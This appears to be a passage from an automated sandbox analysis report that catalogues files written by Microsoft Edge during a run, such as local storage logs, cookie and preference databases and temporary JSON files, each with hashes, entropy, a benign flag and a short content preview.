                                                                                                                                                                                                                                                                                          SHA1:444BD70B5AAADC6A0EA31DA5556860F03B8D58D8
                                                                                                                                                                                                                                                                                          SHA-256:99874B4BB27DAAC81101A5DBE64757B1CC3BB3C65A5DB9C713119774E1DFF95F
                                                                                                                                                                                                                                                                                          SHA-512:4FC3BF5C396A8B5FCB386C3E3B9C280B8B07BB12952A21D91DF97B61AD52529A333178F1B46490A44DBC9F9F7B62CA227213EF3DE82B0A5B5879E4ECB555E4BF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.1t.................VERSION.1..META:https://ntp.msn.com..............!_https://ntp.msn.com..LastKnownPV..1735660765720.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735660766766.._https://ntp.msn.com..MUID!.2A5E9301422D68911D9D866743856932.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735660765845,"schedule":[-1,38,35,-1,-1,-1,4],"scheduleFixed":[-1,38,35,-1,-1,-1,4],"simpleSchedule":[32,42,12,40,33,19,30]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735660765685.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Tue Dec 31 2024 10:59:24 GMT-0500 (Eastern Standard

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):333
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.196276118034853
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:56A+q2P923oH+Tcwt8a2jMGIFUt8MlZmw+MdVkwO923oH+Tcwt8a2jMmLJ:4Fv4Yeb8EFUt8O/++5LYeb8bJ
                                                                                                                                                                                                                                                                                          MD5:E8A382F3A7849F518F1642A5C83099B8
                                                                                                                                                                                                                                                                                          SHA1:9FD6A165432F7BAE0135FA176DAA867F95EA9213
                                                                                                                                                                                                                                                                                          SHA-256:B697406C5B9A76A7FCE88CC7E1FD9070C99E5789F3AFEB7404663E1FEDDED417
                                                                                                                                                                                                                                                                                          SHA-512:98C4D635BEB42EB6AC24602A190B14B872713E9ADF762FEC39E0387A69D56B6B45F9772B4593D87F7BA87DAFA241EFC0D60067D5F25D0B9000B7175F5C4370A9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.909 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/31-10:59:17.947 3f8 Recovering log #3.2024/12/31-10:59:17.950 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):333
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.196276118034853
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:56A+q2P923oH+Tcwt8a2jMGIFUt8MlZmw+MdVkwO923oH+Tcwt8a2jMmLJ:4Fv4Yeb8EFUt8O/++5LYeb8bJ
                                                                                                                                                                                                                                                                                          MD5:E8A382F3A7849F518F1642A5C83099B8
                                                                                                                                                                                                                                                                                          SHA1:9FD6A165432F7BAE0135FA176DAA867F95EA9213
                                                                                                                                                                                                                                                                                          SHA-256:B697406C5B9A76A7FCE88CC7E1FD9070C99E5789F3AFEB7404663E1FEDDED417
                                                                                                                                                                                                                                                                                          SHA-512:98C4D635BEB42EB6AC24602A190B14B872713E9ADF762FEC39E0387A69D56B6B45F9772B4593D87F7BA87DAFA241EFC0D60067D5F25D0B9000B7175F5C4370A9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.909 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/31-10:59:17.947 3f8 Recovering log #3.2024/12/31-10:59:17.950 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\16d3f3d0-7b14-4b84-872e-cc265ac7b64e.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4f7cfcf1-9c50-43c6-8006-2dc594a7babe.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\522b53d0-3d58-4a8a-b036-a528dfa105b8.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.772704835597609
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:tTETeTL1/fYwS42eb9GZMT87sXaQXcf0L/ZJVb:VEWhYwZ2eZGZMnqQXI0LhJVb
                                                                                                                                                                                                                                                                                          MD5:3CA085F78108A5FFC6E67BBB109B97D1
                                                                                                                                                                                                                                                                                          SHA1:E3B70722F6154627B3E0DC9B0964D63BD3AC68D9
                                                                                                                                                                                                                                                                                          SHA-256:7147B9646F1E03076A7186D5532E963B521507CDAC7AEACF4D4C14E17B0D8E85
                                                                                                                                                                                                                                                                                          SHA-512:BCF7FE4243C93FF5B9EC52E12EAA73A5B389831D66985002C25172EB06899CBEEC80F8C732546820F07FFD8A5B71AAA5D8B6A2C74156E5C99A879E14EA514132
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.1115549952015387
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9WL:uIEumQv8m1ccnvS6TlBOt
                                                                                                                                                                                                                                                                                          MD5:1E44E920574155C4D99D185C349B02E9
                                                                                                                                                                                                                                                                                          SHA1:2858A21862197815589AB9614D7FD29737BE4465
                                                                                                                                                                                                                                                                                          SHA-256:851C43B83747911F1937147A38687CB9F68128A0BF74CA53226D4EEEF8F55E02
                                                                                                                                                                                                                                                                                          SHA-512:6E7CBA7A23357B09B35EE4ADBEFFE2C8D8C31BA3A6741415D650E104EBDADF97DEEA26EB7057052493930C79310BFE8AC0331C08EF3ED8C93018FF717A8BF001
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF43739.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF4463d.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\fd173360-bb62-47c1-a6b4-f305673ac680.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (13971), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):13977
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.442111367618343
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stlkdpysIM0sZihUkTSj3HKDuot1yHsIFh68NbV+FRxQwK66WZaFIMYqPaYJ:stlQysInfhTDuS1yMMbGvQw/6WZaTYc
                                                                                                                                                                                                                                                                                          MD5:37EC09CEE7B6E449DD608A823D22A93F
                                                                                                                                                                                                                                                                                          SHA1:64424D56D7A18130FD63A04D3477F75CB448A79A
                                                                                                                                                                                                                                                                                          SHA-256:9640A2859906595350D9D5600F840794AC7F09F051B9279439C516BC1316E674
                                                                                                                                                                                                                                                                                          SHA-512:FC42AF405E24A03F36068F8F39AC1B464A3534C091B91BEF8B051A4C763FCABCF40D9ABF5528835C9562CCC80BB419879CCC80A974F0E000477CE1665AF7388D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380134357689834","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4778e.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (13971), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):13977
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.442111367618343
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stlkdpysIM0sZihUkTSj3HKDuot1yHsIFh68NbV+FRxQwK66WZaFIMYqPaYJ:stlQysInfhTDuS1yMMbGvQw/6WZaTYc
                                                                                                                                                                                                                                                                                          MD5:37EC09CEE7B6E449DD608A823D22A93F
                                                                                                                                                                                                                                                                                          SHA1:64424D56D7A18130FD63A04D3477F75CB448A79A
                                                                                                                                                                                                                                                                                          SHA-256:9640A2859906595350D9D5600F840794AC7F09F051B9279439C516BC1316E674
                                                                                                                                                                                                                                                                                          SHA-512:FC42AF405E24A03F36068F8F39AC1B464A3534C091B91BEF8B051A4C763FCABCF40D9ABF5528835C9562CCC80BB419879CCC80A974F0E000477CE1665AF7388D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380134357689834","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4c139.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (13971), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):13977
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.442111367618343
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stlkdpysIM0sZihUkTSj3HKDuot1yHsIFh68NbV+FRxQwK66WZaFIMYqPaYJ:stlQysInfhTDuS1yMMbGvQw/6WZaTYc
                                                                                                                                                                                                                                                                                          MD5:37EC09CEE7B6E449DD608A823D22A93F
                                                                                                                                                                                                                                                                                          SHA1:64424D56D7A18130FD63A04D3477F75CB448A79A
                                                                                                                                                                                                                                                                                          SHA-256:9640A2859906595350D9D5600F840794AC7F09F051B9279439C516BC1316E674
                                                                                                                                                                                                                                                                                          SHA-512:FC42AF405E24A03F36068F8F39AC1B464A3534C091B91BEF8B051A4C763FCABCF40D9ABF5528835C9562CCC80BB419879CCC80A974F0E000477CE1665AF7388D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380134357689834","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28366
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.556999534773399
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:EIr4/27pLGLhloWPqIftA8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWHtzHrw9pCtuW:EIr4/WchloWPqIftAu1janNzUWtR
                                                                                                                                                                                                                                                                                          MD5:62BA76A3BB5746514FE95F11510A4E40
                                                                                                                                                                                                                                                                                          SHA1:AE4291A10A01FF9E26AE77558E3E4109399205FE
                                                                                                                                                                                                                                                                                          SHA-256:5E4430F24C2BDA78DDCCB61CF82FFEDAAE60B2B93EC05B69A8F75CE82A7DB541
                                                                                                                                                                                                                                                                                          SHA-512:9A7DF3773A947C01B67A2DF040AF7214FA310B9B3E5E7753E44B60A084B08ADBC3EC003B56D38BBEC02143F714BE80110576167CA07B792EEFFB1089B3DDA946
                                                                                                                                                                                                                                                                                          Malicious:false
